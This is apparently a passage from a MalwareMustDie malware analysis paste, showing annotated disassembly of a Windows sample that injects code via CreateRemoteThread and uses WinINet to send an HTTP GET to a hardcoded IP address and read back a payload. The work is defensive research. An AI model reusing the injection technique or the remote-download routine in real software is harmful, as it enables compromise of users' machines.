  516. moteThread,GetLastError,CloseHandle,CloseHandle,WaitFor
  517. SingleObject,CloseHandle,
  518.  
  519. 0x409371    push 0x40CAB8h  ASCII "LoadLibraryW"
  520. 0x409376    push 0x40CAC8h  UTF-16 "kernel32"
  521. 0x40937B    call dword ptr [0x40C158h]  "GetModuleHandleW@KERNEL32.DLL" (Import, 1 Params)
  522. 0x409381    push eax   
  523. 0x409382    call dword ptr [0x40C0E8h]  "GetProcAddress@KERNEL32.DLL" (Import, 2 Params)
  524. 0x409388    push eax   
  525. 0x409389    push ebx   
  526. 0x40938A    push ebx   
  527. 0x40938B    push edi   
  528. 0x40938C    call dword ptr [0x40C0D0h]  "CreateRemoteThread@KERNEL32.DLL" (Import, 7 Params) // <<== here here!
  529. 0x409392    mov dword ptr [ebp+08h], eax   
  530. 0x409395    call esi    GetLastError@KERNEL32.DLL (Import, Unknown Params)
  531. 0x409397    mov esi, dword ptr [0x40C130h]  CloseHandle@KERNEL32.DLL (Import, 1 Params)
  532.  
  533.  
  534. // Downloading via WININET.DLL...
  535.  
  536. 0040A4CA    call dword ptr [0040C268h]  "InternetConnectA@WININET.DLL" (Import, 8 Params)
  537. 0040A4D0    mov dword ptr [ebp-18h], eax   
  538. 0040A4D3    cmp eax, ebx   
  539. 0040A4D5    je 0040A610h    target: 0040A610
  540. 0040A4DB    push esi    ASCII "79.133.196.94"
  541. 0040A4DC    push 00000001h 
  542. 0040A4DE    push 00400000h 
  543. 0040A4E3    push ebx   
  544. 0040A4E4    push ebx   
  545. 0040A4E5    push ebx   
  546. 0040A4E6    push dword ptr [ebp+10h]   
  547. 0040A4E9    push 00410A4Ch  ASCII "GET"
  548. 0040A4EE    push eax   
  549. 0040A4EF    call dword ptr [0040C278h]  "HttpOpenRequestA@WININET.DLL" (Import, 8 Params)
  550. 0040A4F5    mov esi, eax   
  551. 0040A4F7    mov dword ptr [ebp+08h], esi   
  552. 0040A4FA    cmp esi, ebx   
  553. 0040A4FC    je 0040A602h    target: 0040A602
  554. 0040A502    push dword ptr [ebp+14h]   
  555. 0040A505    lea eax, dword ptr [ebp-00000118h] 
  556. 0040A50B    push 00410A50h  ASCII "Host: %s"
  557. 0040A510    push eax   
  558. 0040A511    call dword ptr [0040C2E0h]  sprintf@MSVCRT.DLL (Import, 0 Params)
  559. 0040A517    add esp, 0Ch   
  560. 0040A51A    push A0000000h 
  561. 0040A51F    push FFFFFFFFh 
  562. 0040A521    lea eax, dword ptr [ebp-00000118h] 
  563. 0040A527    push eax   
  564. 0040A528    push esi   
  565. 0040A529    call dword ptr [0040C27Ch]  "HttpAddRequestHeadersA@WININET.DLL" (Import, 4 Params)
  566. 0040A52F    test eax, eax  
  567. 0040A531    je 0040A5F4h    target: 0040A5F4
  568. 0040A537    push ebx   
  569. 0040A538    push ebx   
  570. 0040A539    push ebx   
  571. 0040A53A    push ebx   
  572. 0040A53B    push esi   
  573. 0040A53C    call dword ptr [0040C274h]  "HttpSendRequestW@WININET.DLL" (Import, 5 Params)
  574. 0040A542    test al, al
  575. 0040A544    je 0040A5F0h    target: 0040A5F0
  576. 0040A54A    mov esi, 00000082h 
  577. 0040A54F    push esi   
  578. 0040A550    call dword ptr [0040C2E8h]  malloc@MSVCRT.DLL (Import, 0 Params)
  579. 0040A556    push esi   
  580. 0040A557    push ebx   
  581. 0040A558    push eax   
  582. 0040A559    mov dword ptr [ebp+10h], eax   
  583. 0040A55C    mov dword ptr [edi], eax   
  584. 0040A55E    call 0040B208h  memset@MSVCRT.DLL (Import, 0 Params) target: 0040B208
  585. 0040A563    add esp, 10h   
  586. 0040A566    push ebx    xref: 0040A5D5
  587. 0040A567    push ebx   
  588. 0040A568    lea eax, dword ptr [ebp-10h]   
  589. 0040A56B    push eax   
  590. 0040A56C    push dword ptr [ebp+08h]   
  591. 0040A56F    call dword ptr [0040C26Ch]  "InternetQueryDataAvailable@WININET.DLL" (Import, 4 Params)
  592. 0040A575    test eax, eax  
  593. 0040A577    je 0040A5E3h    target: 0040A5E3
  594. 0040A579    cmp dword ptr [ebp-10h], ebx   
  595. 0040A57C    je 0040A5E3h    target: 0040A5E3
  596. 0040A57E    push dword ptr [ebp-10h]   
  597. 0040A581    call dword ptr [0040C2E8h]  malloc@MSVCRT.DLL (Import, 0 Params)
  598. 0040A587    pop ecx
  599. 0040A588    lea ecx, dword ptr [ebp-0Ch]   
  600. 0040A58B    push ecx   
  601. 0040A58C    push dword ptr [ebp-10h]   
  602. 0040A58F    mov dword ptr [ebp+0Ch], eax   
  603. 0040A592    push eax   
  604. 0040A593    push dword ptr [ebp+08h]   
  605. 0040A596    call dword ptr [0040C270h]  "InternetReadFile@WININET.DLL" (Import, 4 Params)
  606. 0040A59C    test eax, eax  
  607. 0040A59E    je 0040A5D9h    target: 0040A5D9
  608. 0040A5A0    cmp dword ptr [ebp-0Ch], ebx   
  609. 0040A5A3    je 0040A5D9h    target: 0040A5D9
  610. 0040A5A5    mov eax, dword ptr [ebp-08h]   
  611. 0040A5A8    mov edi, esi   
  612. 0040A5AA    sub edi, eax   
  613. 0040A5AC    cmp dword ptr [ebp-0Ch], edi   
  614. 0040A5AF    jnc 0040A5B4h   target: 0040A5B4
  615. 0040A5B1    mov edi, dword ptr [ebp-0Ch]   
  616. 0040A5B4    mov ecx, dword ptr [ebp+10h]    xref: 0040A5AF
  617. 0040A5B7    push edi   
  618. 0040A5B8    push dword ptr [ebp+0Ch]   
  619. 0040A5BB    add ecx, eax   
  620. 0040A5BD    push ecx
  621. [...]
  622.  
  623. ------
  624. #MalwareMustDie!
  625. "Thou shalt not make malware Botnet!"
RAW Paste Data